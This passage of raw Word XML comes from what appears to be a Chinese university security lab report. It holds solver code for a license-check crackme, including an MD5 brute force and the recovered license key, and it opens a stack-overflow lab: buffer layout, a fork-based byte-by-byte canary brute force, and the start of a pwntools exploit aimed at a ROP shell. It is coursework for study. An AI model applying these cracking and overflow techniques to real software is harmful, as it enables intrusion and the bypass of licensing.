    <w:p w14:paraId="11CAD129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c1 = (d1 &lt;&lt; 4) &amp; 0x7F  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3429822B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c1 = c1 | (d2 &gt;&gt; 2)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A13D04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c2 = (d2 &lt;&lt; 6) &amp; 0x7F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# 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1BD1451A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c2 = 48  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0915B948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c3 = d3 ^ c2  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1054E463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part3 = chr(c0) + chr(c1) + chr(c2) + chr(c3)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6673D6B9">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5360670" cy="5396230"/>
            <wp:effectExtent l="9525" t="9525" r="20955" b="234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0670" cy="5396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75FB65">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:jc w:val="center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eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>图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1-5 license校验逻辑</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="6"/>
    <w:p w14:paraId="4E9FD94C">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:spacing w:before="164" w:after="164"/>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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第三部分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也可使用z3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进行约束求解：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3920D8E7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# 第三部分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27A54724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part3 = ""  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BC14C2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solver = Solver()  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD50459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 = BitVecs(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'c0 c1 c2 c3'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8)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B4C5B1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range(4):  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A80C729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solver.add(s[i] &gt;= 0x30)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285D8F5E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solver.add(s[i] &lt;= 0x7A)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227DCFA2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solver.add((s[0] &gt;&gt; 2) &amp; 0x3F == table.index(part3_ans[0]))  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3571E8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solver.add(((s[1] &gt;&gt; 4) &amp; 0xF) | ((s[0] &lt;&lt; 4) &amp; 0x30) == table.index(part3_ans[1]))  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DF27CC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solver.add(((s[2] &gt;&gt; 6) &amp; 0x3) | ((s[1] &lt;&lt; 2) &amp; 0x3C) == table.index(part3_ans[2]))  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C461708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solver.add(s[3] ^ s[2] &amp; 0x3F  == table.index(part3_ans[3]))  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10902418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solver.check() == sat:  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B756FE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result = solver.model()  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B64A077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part3 += chr(result[s[0]].as_long())  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78742914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part3 += chr(result[s[1]].as_long())  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079D4114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part3 += chr(result[s[2]].as_long())  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418A31C0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part3 += chr(result[s[3]].as_long()) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA7AB55">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:spacing w:before="164" w:after="164"/>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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第四部分爆破四字节m</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>d5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，得到第四部分为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:cs="Times New Roman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z</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>m4R’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。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47852871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md5_crack():  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB52704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md5_ans = part4_ans  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740D3216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c0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table:  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5DAFC1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c1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table:  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CDE8F2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c2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table:  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B602749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c3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table:  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E33C7FC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s = c0 + c1 + c2 + c3  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F38B32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(md5(s.encode()).digest()[12:] == md5_ans):  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A265085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s  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDC0F46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None  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF993BE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6DD0E43A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part4 = md5_crack()  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5089A84A">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:spacing w:before="164" w:after="164"/>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default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程序完整license为DiQJ-xTpH-OR06-zm4R，测试license获取flag（如图1-6所示）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268585B4">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:spacing w:before="164" w:after="164"/>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5483860" cy="1190625"/>
            <wp:effectExtent l="9525" t="9525" r="12065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190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8D3389">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:jc w:val="center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eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>图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1-6 测试license</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761E44E1">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="328" w:after="328"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc601835307"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>栈</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>保护机制绕过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>利用</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="78039AF9">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="328" w:after="164"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc1490919153"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验目的</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="69ECF7E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>掌握反汇编代码分析工具分析原理与使用方法；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B7913E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>掌握栈溢出和 Stack Canary 的原理；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F79E47A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>掌握栈溢出漏洞的利用技巧和 Stack Canary 的绕过手法；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5495FEB7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>理解栈溢出漏洞的防范措施；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0256549C">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="328" w:after="164"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc1528328216"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验要求</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="02822699">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调试与掌握函数反汇编执行流程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F20F22A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定位程序溢出点</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB5F6D8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Stack Canary 爆破绕过，劫持程序控制流；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5CFBA5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编写 ROP 链，获取具有任意命令执行功能的 Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F02F49">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="328" w:after="164"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc719950704"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验环境</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="2C95A671">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验平台：pwn.hust.college</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385BEE36">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作系统：Ubuntu 20.04</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D36E15C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>溢出软件：mitigation-bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7353BD49">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>溢出工具：pwndbg，vscode，XFCE桌面，bash命令行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IDA Pro</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534643EF">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="328" w:after="164"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc2055905307"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验过程记录</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="1AED65C9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>定位程序溢出点</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE5742D">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:topLinePunct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checksec检查程序保护开启情况（如图2-1所示），程序开启了栈保护，未开启PIE保护，程序每次加载地址固定为0x400000。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052312BE">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:topLinePunct/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3895090" cy="1119505"/>
            <wp:effectExtent l="9525" t="9525" r="19685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119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2A9E8D">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:jc w:val="center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eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>图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2-1 程序保护情况</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3B90BB">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:topLinePunct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IDA Pro加载mitigation-bypass程序，定位main函数F5反编译分析程序功能，主程序使用fork创建子进程，子进程执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>read_input</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>函数处理用户输入，分析read</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>_input</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>函数（如图2-2所示）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78369ADE">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:topLinePunct/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3839210" cy="3696335"/>
            <wp:effectExtent l="9525" t="9525" r="18415" b="279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210" cy="3696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E20D6F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:jc w:val="center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eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>图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2-2 read</w:t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_input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函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B2EFDE">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:topLinePunct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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>_input</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>函数使用read从标准输入读取0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>x100</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>字节到缓冲区buf中，程序返回时对栈中stack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>_canary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>进行校验，函数栈帧如图</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>3所示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCEB20C">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:topLinePunct/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="2663825" cy="1363345"/>
            <wp:effectExtent l="0" t="0" r="317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6350F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:jc w:val="center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eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>图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2-3 read</w:t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_input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栈帧</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DD44F5">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:topLinePunct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根据栈帧所示，缓冲区buf大小为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>0x68</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，buf后面3个8字节依次为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>stack_canary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>、saved</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>_rbp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saved_ret</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。由于read读取的长度为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>0x100</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，当输入长度大于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>0x68</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>时，将发生缓冲区溢出，覆盖</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>stack_canary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>甚至覆盖返回地址</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>saved_ret</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1CC423">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Stack Canary爆破绕过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D0277C">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:topLinePunct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/>
        </w:rPr>
        <w:t>read_input</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>函数是由fork函数创建的子进程执行的，其stack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>_canary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>与父进程相同，因此每一次的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>read_input</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>函数的stack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>_canary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>相同，可以考虑使用逐字节爆破方式得到完整的8字节</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>stack_canary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7190E664">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:topLinePunct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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>_input</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>函数正常返回到主函数时，输出提示字符串</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>’have fun’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，可根据该字符串确定爆破的字节是否正确。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7983C3C4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payload0 = cyclic(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0x68)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# buf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331FA35C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# byte_by_byte爆破stack_canary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529F4F69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range(8):  </w:t>
